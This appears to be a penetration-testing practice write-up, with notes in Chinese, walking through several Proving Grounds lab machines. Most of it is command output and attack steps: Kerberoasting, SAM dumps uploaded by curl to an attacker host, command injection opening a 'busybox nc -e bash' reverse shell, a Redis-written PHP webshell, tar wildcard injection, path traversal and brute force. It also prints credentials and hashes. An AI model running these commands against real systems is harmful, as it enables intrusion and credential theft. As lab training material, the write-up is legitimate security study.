MSSQL 192.168.217.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
MSSQL_PRIV 192.168.217.40 1433 DC [*] HAERO\discovery can impersonate: hrappdb-reader
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ nxc mssql '192.168.217.40' -u 'discovery' -p 'Start123!' -M mssql_priv -o ACTION=privesc
MSSQL 192.168.217.40 1433 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:hokkaido-aerospace.com)
MSSQL 192.168.217.40 1433 DC [+] hokkaido-aerospace.com\discovery:Start123!
MSSQL_PRIV 192.168.217.40 1433 DC [*] HAERO\discovery can impersonate: hrappdb-reader
MSSQL_PRIV 192.168.217.40 1433 DC [-] can't find any path to privesc
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ impacket-mssqlclient 'hokkaido-aerospace.com'/'discovery':'Start123!'@'192.168.217.40' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (HAERO\discovery guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------------- --------------
b'LOGIN' b'' IMPERSONATE GRANT HAERO\services hrappdb-reader
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader';
SQL (hrappdb-reader guest@master)> SELECT name FROM sys.databases;
name
-------
master
tempdb
model
msdb
hrappdb
SQL (hrappdb-reader guest@master)> use hrappdb;
ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT name FROM sys.tables;
name
-------
sysauth
SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from sysauth;
id name password
-- ---------------- ----------------
0 b'hrapp-service' b'Untimed$Runny'
SQL (hrappdb-reader hrappdb-reader@hrappdb)> 拿到 hrapp-service 就有了整個攻擊思路
取得 Hazel.Green 的 Kerberoast hash ,並破解得到密碼為 haze1988
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ python3 ~/tools/AD/targetedKerberoast/targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Hazel.Green)
[+] Printing hash for (Hazel.Green)
$krb5tgs$23$*Hazel.Green$HOKKAIDO-AEROSPACE.COM$hokkaido-aerospace.com/Hazel.Green*$f2d19b90e90d2beb8c7d0dc14f2f916b$05bd0f3d4dc7582757d277b86ee24e1d7db4c63757f21349bd4f75920862f0c53c85720ad8327ba0d81004df628c6125ca10eafdf9d89154b1b64269b247833d3d7c994d2718f3d3a1fc9185d9ac47d0e6036d00185d3f92485ea0c0ab3ba9f22f04ecdbff1ac5eb5ac176689c710c7b9a3ef8bb9220ec4fbf1da2ffe2ac08aa6687cb1d3d9fdc71c99da2acb154fd6193577c142e23a6061c56e9fe5341a8618a9c78888d35676b0932ffd5f3fa96b4eb182e10e479c72e677cd57475ad5b3dc6324775c2b62ea462835ae91e662285f4ea9d9060dd8bf8b179245a700c5ecc237df5971ff0921ecbc203dc389f16f0275ff4a3a7491810b66578196ac545cc03407b32594373274fa68cfff72ade5a840f0031d9c5e153eb29cf1702b4aa37160d013f302d4708faee8ae10a144327419ca256b7e64aca328534ce995c62e079ae9c675d80a7c887d8ef2b113d54ba7cb4e6cf395e8a350cf896fc7429a81731fc91d41760ac451fedccac244e4d85f1388cf1e8ffc5471b3a27c081e649fe7bbbf841f0c926dae40ba8d7a9e918c7a526dad0363d7b96cc0c3709acd73c2b60ad93abcb70074977332e8847cb3a212770bd7dbcda929bc504512b8d2cadc8eb6fe917b1254f4b7a3b1acfd89341ef898127d73b402d6e3f58886c56c315c6b3fbdc244145384c7bc4d7e24c3fdecd0074b016e25d87a14e1a8a2f8f76e5c8c1f8be4ff71468903ca3c1c12a57b03db9d538399efa52966ded3b1f7f1c834462e10be473bf10a42a7ccd6da6705460dca4decb2780a9fc03d90a84a2971d882208fe015f4380a9a1d4ff4582bbe441431bbbb47c115075fc8086bb0898840ed96d118ad8f484171f53d112b469eb6287e7095e2bfa0d2c31ae0b1e4117affb389235a8ff9b2a204fb654544f1b263c6775c174a50c77bbd69240f7a068e704410ed7b869d97d2cca794340f74337c2442944dc48712a1bbf6654a94f248da97153938487fecb5b6a366c1163041b725359463d0a447bbde86b5e23e4f17f66bdd1beaabccf25bcdc43cd2aa1db8ff4bac8efd6a466c8188f4d00436df9e4d0eeda8f5d01d62dfb9e2445c5263fd3163e06dd8e6d9109777c667b1ff99b837b8cb2fc5ec73918131f53e9663c32423623e838b111a934b022fdaf36f6f8a34416ce5bf54894ad8397621b909f6c9a9bab5715d301786eb9f563db426897b9f5b4640d6e6fab1074287b6d5e2b1685f2a8d9f69a16ed07edd93c9e497f1c4b65767247d82d0493512fa30ebe4c1d7fc911f34fa3e44b36f89c7d51f85b58284f0c228f53d796b73c6b0b72ba9ce5f5df7cfe729696e4c9129eba8acbef117a2f5427931f6fe9bdc427c92468720f02ddc55d86e40789e983f4909be8bcc26820ebb624f1ab2a2f659f742f6655664a9eea2cfda6a0583f405e64064f79ad8915b0d95704a7a2b72b205f5fe13bb0f64829c75aa0c3a449fe7f7eb37f18c30f5548e88d6e3912d7ec39fa870575d37d97180761d13f2fb787763e4840762d056cb18ca4db141b2057cf854be0aa762e306f8fc2f09f0b7debd008b2a2e400d0b42883db9e30ff69f5998687e499f57ff187c30f736570b6c08ed743d54826ccdf26c05a8acf86333b36f1b70e
[VERBOSE] SPN removed successfully for (Hazel.Green)HAZEL.GREEN 是 member of TIER2-ADMINS,TIER2-ADMINS 對 MOLLY.SMITH 有 ForceChangePassword 權限,直接修該 MOLLY.SMITH 的密碼
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ bloodyAD --host 192.168.217.40 -d hokkaido-aerospace.com -u Hazel.Green -p haze1988 set password MOLLY.SMITH pwn
[+] Password changed successfully!RDP 進去後就拿到 local 了
Privilege Escalation
molly.smith 在 Tier1-Admins group
PS C:\Users\MOLLY.SMITH> net user molly.smith
User name Molly.Smith
Full Name Molly Smith
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/1/2025 10:02:49 PM
Password expires Never
Password changeable 7/2/2025 10:02:49 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/1/2025 10:25:46 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Tier1-Admins
*it
The command completed successfully.run as administrator 的方式打開 powershell ,查看 molly.smith 擁有的完整權限
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeSystemtimePrivilege Change the system time Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled轉存 SAM system
PS C:\Users\MOLLY.SMITH> reg save hklm\sam sam
The operation completed successfully.
PS C:\Users\MOLLY.SMITH> reg save hklm\system system
The operation completed successfully.
PS C:\Users\MOLLY.SMITH> curl.exe -F files=@sam http://192.168.45.181:8000/upload
PS C:\Users\MOLLY.SMITH> curl.exe -F files=@system http://192.168.45.181:8000/upload
PS C:\Users\MOLLY.SMITH>┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x2fcb0ca02fb5133abd227a05724cd961
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d752482897d54e239376fddb2a2109e4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... Proof
┌──(kali㉿kali)-[~/oscp/pg/hokkaido]
└─$ evil-winrm -u 'Administrator' -H 'd752482897d54e239376fddb2a2109e4' -i '192.168.217.40'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> type desktop\proof.txt
e13b02f4b6ace5c8233b9513886d5c85
*Evil-WinRM* PS C:\Users\Administrator> Fish
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.217.168 | TCP:135,139,445,3389,3370,4848,5040,6060,7676,7776,8080,8181,8686 |
Web enumeration
在 4848 port 跑著有 Arbitrary File Read vuln 的 service,6060 port 跑 synaman 5.1
Initial Access
查詢得知 synaman 的帳密文件位於 C:\SynaMan\config 資料夾內,透過另一個 service Arbitrary File Read vuln 找到帳密
┌──(kali㉿kali)-[~/oscp/pg/Fish]
└─$ curl "http://192.168.217.168:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/SynaMan/config/AppConfig.xml"
<?xml version="1.0" encoding="UTF-8"?>
<Configuration>
<parameters>
<parameter name="adminEmail" type="1" value="admin@fish.pg"></parameter>
<parameter name="smtpSecurity" type="1" value="None"></parameter>
<parameter name="jvmPath" type="1" value="jre/bin/java"></parameter>
<parameter name="userHomeRoot" type="1" value="C:\ProgramData\SynaManHome"></parameter>
<parameter name="httpPortSSL" type="2" value="-1"></parameter>
<parameter name="httpPort" type="2" value="0"></parameter>
<parameter name="vmParams" type="1" value="-Xmx128m -DLoggingConfigFile=logconfig.xml"></parameter>
<parameter name="synametricsUrl" type="1" value="http://synametrics.com/SynametricsWebApp/"></parameter>
<parameter name="lastSelectedTab" type="1" value="1"></parameter>
<parameter name="emailServerWebServicePort" type="2" value=""></parameter>
<parameter name="imagePath" type="1" value="images/"></parameter>
<parameter name="defaultOperation" type="1" value="frontPage"></parameter>
<parameter name="publicIPForUrl" type="1" value=""></parameter>
<parameter name="flags" type="2" value="2"></parameter>
<parameter name="httpPort2" type="2" value="6060"></parameter>
<parameter name="useUPnP" type="4" value="true"></parameter>
<parameter name="smtpServer" type="1" value="mail.fish.pg"></parameter>
<parameter name="smtpUser" type="1" value="arthur"></parameter>
<parameter name="InitialSetupComplete" type="4" value="true"></parameter>
<parameter name="disableCsrfPrevention" type="4" value="true"></parameter>
<parameter name="failureOverHttpPort" type="2" value="55222"></parameter>
<parameter name="smtpPort" type="2" value="25"></parameter>
<parameter name="httpIP" type="1" value=""></parameter>
<parameter name="emailServerWebServiceHost" type="1" value=""></parameter>
<parameter name="smtpPassword" type="1" value="KingOfAtlantis"></parameter>
<parameter name="ntServiceCommand" type="1" value="net start SynaMan"></parameter>
<parameter name="mimicHtmlFiles" type="4" value="false"></parameter>
</parameters>
</Configuration> RDP 進去
Privilege Escalation
powerup 檢查
ServiceName : domain1
Path : C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
ModifiableFile : C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'domain1'
CanRestart : False
Name : domain1
Check : Modifiable Service Files再次確認有權限寫入並利用
PS C:\Users\arthur> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\arthur> icacls C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\arthur> mv C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe.bak
PS C:\Users\arthur> cp //192.168.45.181/share/pwn.exe C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe
PS C:\Users\arthur>重啟電腦後收到 revshell
┌──(kali㉿kali)-[~/oscp/pg/Fish]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.181] from (UNKNOWN) [192.168.217.168] 49668
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>Xposedapi
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.104.134 | TCP:22,13337 |
Web enumeration
13337 port 運行 web service ,在訪問 /logs ,顯示 Access Denied for this Host.,修該 x-forwarded-for: localhost ,成功繞過。顯示 GET file ,這個參數有 Path Traversal,可以讀取 /etc/passwd,透過 /logs?file=main.py ,讀取到網站 source code
整理如下
#!/usr/bin/env python3
from flask import Flask, jsonify, request, render_template, Response
from Crypto.Hash import MD5
import json, os, binascii
app = Flask(__name__)
@app.route('/')
def home():
return render_template("home.html")
@app.route('/update', methods=["POST"])
def update():
if request.headers['Content-Type'] != "application/json":
return "Invalid content type."
else:
data = json.loads(request.data)
if data['user'] != "clumsyadmin":
return "Invalid username."
else:
os.system("curl {} -o /home/clumsyadmin/app".format(data['url']))
return "Update requested by {}. Restart the software for changes to take effect.".format(data['user'])
@app.route('/logs')
def readlogs():
if request.headers.getlist("X-Forwarded-For"):
ip = request.headers.getlist("X-Forwarded-For")[0]
else:
ip = "1.3.3.7"
if ip == "localhost" or ip == "127.0.0.1":
if request.args.get("file") is None:
return "Error! No file specified. Use file=/path/to/log/file to access log files.", 404
else:
with open(request.args.get("file"), 'r') as f:
data = f.read()
return render_template("logs.html", data=data)
else:
return "WAF: Access Denied for this Host.", 403
@app.route('/version')
def version():
hasher = MD5.new()
with open("/home/clumsyadmin/app", 'rb') as f:
d = f.read()
hasher.update(d)
appHash = binascii.hexlify(hasher.digest()).decode()
return "1.0.0b{}".format(appHash)
@app.route('/restart', methods=["GET", "POST"])
def restart():
if request.method == "GET":
return render_template("restart.html")
else:
os.system("killall app")
os.system("bash -c '/home/clumsyadmin/app&'")
return "Restart Successful."Initial Access
在 /update 可以 command injection ,並且測試可行
┌──(kali㉿kali)-[~/oscp/pg/XposedAPI]
└─$ curl -X POST http://192.168.104.134:13337/update \
-H "Content-Type: application/json" \
-d '{"user": "clumsyadmin", "url": ";ping -c 4 192.168.45.243;"}'
Update requested by clumsyadmin. Restart the software for changes to take effect.
---
┌──(kali㉿kali)-[~]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
22:57:03.054524 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 1, length 64
22:57:03.056629 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 1, length 64
22:57:04.057069 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 2, length 64
22:57:04.057091 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 2, length 64
22:57:05.058390 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 3, length 64
22:57:05.058406 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 3, length 64
22:57:06.059865 IP 192.168.104.134 > 192.168.45.243: ICMP echo request, id 869, seq 4, length 64
22:57:06.059881 IP 192.168.45.243 > 192.168.104.134: ICMP echo reply, id 869, seq 4, length 64Proof
┌──(kali㉿kali)-[~]
└─$ curl -X POST http://192.168.104.134:13337/update \
-H "Content-Type: application/json" \
-d '{"user": "clumsyadmin", "url": ";busybox nc 192.168.45.243 4444 -e bash;"}'
---
┌──(kali㉿kali)-[~/oscp/pg/XposedAPI]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.243] from (UNKNOWN) [192.168.104.134] 55626
python3 -c 'import pty;pty.spawn("/bin/bash")'
clumsyadmin@xposedapi:~/webapp$ cd ~
cd ~
clumsyadmin@xposedapi:~$ ls
ls
app local.txt webapp
clumsyadmin@xposedapi:~$ cat local.txt
cat local.txt
d302915ee9a68152e245ced494ccea3a
clumsyadmin@xposedapi:~$ Privilege Escalation – SUID
clumsyadmin@xposedapi:~$ TF=$(mktemp)
chmod +x $TF
TF=$(mktemp)
clumsyadmin@xposedapi:~$ chmod +x $TF
clumsyadmin@xposedapi:~$ echo -e '#!/bin/bash -p\n/bin/bash -p 1>&0' >$TF
echo -e '#!/bin/bash -p\n/bin/bash -p 1>&0' >$TF
clumsyadmin@xposedapi:~$ /usr/bin/wget --use-askpass=$TF 0
/usr/bin/wget --use-askpass=$TF 0
bash-5.0# id
id
uid=1000(clumsyadmin) gid=1000(clumsyadmin) euid=0(root) groups=1000(clumsyadmin)
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
33a3dd42641cc13beb1942c9e8d449bd
bash-5.0# Marketing
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.200.225 | TCP:22,80 |
Web enumeration
枚舉到 /old/ 目錄,進行連結比較後發現 /old 多一個
┌──(kali㉿kali)-[~/oscp/pg/Marketing]
└─$ curl http://192.168.200.225/ | grep -Eo '([a-zA-Z0-9.-]+\.[a-zA-Z]{2,}|[0-9]{1,3}(\.[0-9]{1,3}){3})' | sort -u | wc -l
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 18286 100 18286 0 0 86508 0 --:--:-- --:--:-- --:--:-- 86254
37
┌──(kali㉿kali)-[~/oscp/pg/Marketing]
└─$ curl http://192.168.200.225/old/ | grep -Eo '([a-zA-Z0-9.-]+\.[a-zA-Z]{2,}|[0-9]{1,3}(\.[0-9]{1,3}){3})' | sort -u | wc -l
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 20423 100 20423 0 0 95506 0 --:--:-- --:--:-- --:--:-- 95434
38比較後發現多出一個 customers-survey.marketing.pg 把它加進去 /etc/hosts
┌──(kali㉿kali)-[~]
└─$ echo "192.168.200.225 customers-survey.marketing.pg" | sudo tee -a /etc/hosts
[sudo] password for kali:
192.168.200.225 customers-survey.marketing.pg該網站運行 LimeSurvey 有 auth RCE
Initial Access
使用 exploit ,完成一部分,按照報錯的部分手動完成拿到 www-data,找到 mysql 連線密碼
www-data@marketing:/var/www/LimeSurvey/application/config$ cat config.php
cat config.php
<?php if (!defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| 'connectionString' Hostname, database, port and database type for
| the connection. Driver example: mysql. Currently supported:
| mysql, pgsql, mssql, sqlite, oci
| 'username' The username used to connect to the database
| 'password' The password used to connect to the database
| 'tablePrefix' You can add an optional prefix, which will be added
| to the table name when using the Active Record class
|
*/
return array(
'components' => array(
'db' => array(
'connectionString' => 'mysql:host=localhost;port=3306;dbname=limesurvey;',
'emulatePrepare' => true,
'username' => 'limesurvey_user',
'password' => 'EzPwz2022_dev1$$23!!',
'charset' => 'utf8mb4',
'tablePrefix' => 'lime_',
),嘗試用 t.miller/EzPwz2022_dev1$$23!! SSH 登入成功
Proof
t.miller@marketing:~$ cat
.bash_history .bash_logout .bashrc .cache/ local.txt .profile
t.miller@marketing:~$ cat local.txt
b31310e9f2a5b0888c2ea2e83cd35ab3
t.miller@marketing:~Hutch
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.206.122 | TCP:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 |
ldap enum
用 ldapsearch 在其中的 description 找到密碼 CrabSharkJellyfish192 對應到 user fmcsorley
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ ldapsearch -x -H ldap://192.168.206.122 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=hutch,DC=offsec
namingcontexts: CN=Configuration,DC=hutch,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=hutch,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=hutch,DC=offsec
namingcontexts: DC=ForestDnsZones,DC=hutch,DC=offsec
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ ldapsearch -x -H ldap://192.168.206.122 -D '' -w '' -b "DC=hutch,DC=offsec"
省略
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
hange on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132489437036308102
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: fmcsorley@hutch.offsec
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec
dSCorePropagationData: 20201104053513.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132579563744834908
msDS-SupportedEncryptionTypes: 0Initial Access
用 bloodhound-python 收集完資料後,在 bloodhound 中看到目前拿到的 user 對於 DC 有 ReadLAPSPassword 參考這篇拿到 administrator 密碼並用 winrm 拿到 shell
Proof
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ bloodyAD -u fmcsorley -d hutch.offsec -p CrabSharkJellyfish192 --host 192.168.206.122 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
distinguishedName: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
ms-Mcs-AdmPwd: 5Q,C2{Xt&22]+4
ms-Mcs-AdmPwdExpirationTime: 133978075072851905
┌──(kali㉿kali)-[~/oscp/pg/Hutch]
└─$ evil-winrm -u 'administrator' -p '5Q,C2{Xt&22]+4' -i '192.168.206.122'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hutch\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Readys
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.122.166 | TCP:22,80,6379 |
Web enumeration
網站是 wordpress CMS ,用 wpscan 發現使用 Plugin Site Editor 1.1.1 ,有 LFI 漏洞且無法使用 log poisoning、php filter chain
Initial Access
透過 LFI 讀取 redis 的 password 。得到密碼 Ready4Redis?
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ curl http://192.168.122.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf > redis.conf
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 61899 0 61899 0 0 202k 0 --:--:-- --:--:-- --:--:-- 203k
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ cat redis.conf | grep -i pass
# 2) No password is configured.
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the replica missed while
# Require clients to issue AUTH <PASSWORD> before processing any other
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
requirepass Ready4Redis?登入 redis ,並將 webshell 寫入 /dev/shm/ 讓 php 可以正常執行
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ redis-cli -h 192.168.122.166
192.168.122.166:6379> AUTH Ready4Redis?
OK
192.168.122.166:6379> config set dir /dev/shm/
OK
192.168.122.166:6379> config set dbfilename shell.php
OK
192.168.122.166:6379> set test "<?php system($_GET['cmd']);?>"
OK
192.168.122.166:6379> save成功 RCE
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ curl "http://192.168.122.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/shell.php&cmd=id" --output -
REDIS0009� redis-ver5.0.14�
�edis-bits�@�ctime��Lhused-mem▒
aof-preamble���testuid=1000(alice) gid=1000(alice) groups=1000(alice)
����a� �{"success":true,"data":{"output":[]}} Proof
┌──(kali㉿kali)-[~/oscp/pg/Readys]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.166] 44344
<ite-editor/editor/extensions/pagebuilder/includes$ cd ~
cd ~
alice@readys:/home/alice$ ls
ls
local.txt
alice@readys:/home/alice$ cat local.txt
cat local.txt
29d1f99a096cca8ec9b2256ce644e3f6
alice@readys:/home/alice$ Privilege Escalation – crontab
利用 crontab ,搭配 wildcard injection,讓 tar 執行 exp.sh 。
alice@readys:/var/www/html$ cat /etc/crontab
cat /etc/crontab
*/3 * * * * root /usr/local/bin/backup.sh
alice@readys:/var/www/html$ cat /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi
alice@readys:/var/www/html$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exp.sh
echo "chmod +s /bin/bash" > exp.sh
alice@readys:/var/www/html$ touch -- "--checkpoint-action=exec=bash exp.sh"
touch -- "--checkpoint-action=exec=bash exp.sh"
alice@readys:/var/www/html$ Proof
alice@readys:/var/www/html$ ls -lh /bin/bash
ls -lh /bin/bash
-rwsr-sr-x 1 root root 1.2M Apr 18 2019 /bin/bash
alice@readys:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-5.0# cat /root/proof.txt
cat /root/proof.txt
023982c4b987b120aeffa6d4ede352cc
bash-5.0# Monster
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.122.180 | TCP:80,135,139,443,445,3389,5040,7680 |
Web enumeration
路徑爆破找到 /blog ,跑 Monstra 3.0.4 ,有 auth RCE 。使用 cewl 把網站可能的帳密抓下來。嘗試用抓下來的 list 爆破 admin 的密碼,最終找到 wazowski
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ cewl http://monster.pg/index.html > list
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ hydra -l admin -P list monster.pg http-post-form "/blog/admin/index.php:login=^USER^&password=^PASS^&login_submit=Log+In:Wrong" -v
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-13 03:50:53
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 190 login tries (l:1/p:190), ~12 tries per task
[DATA] attacking http-post-form://monster.pg:80/blog/admin/index.php:login=^USER^&password=^PASS^&login_submit=Log+In:Wrong
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://monster.pg:80/blog/admin/index.php
[STATUS] attack finished for monster.pg (waiting for children to complete tests)
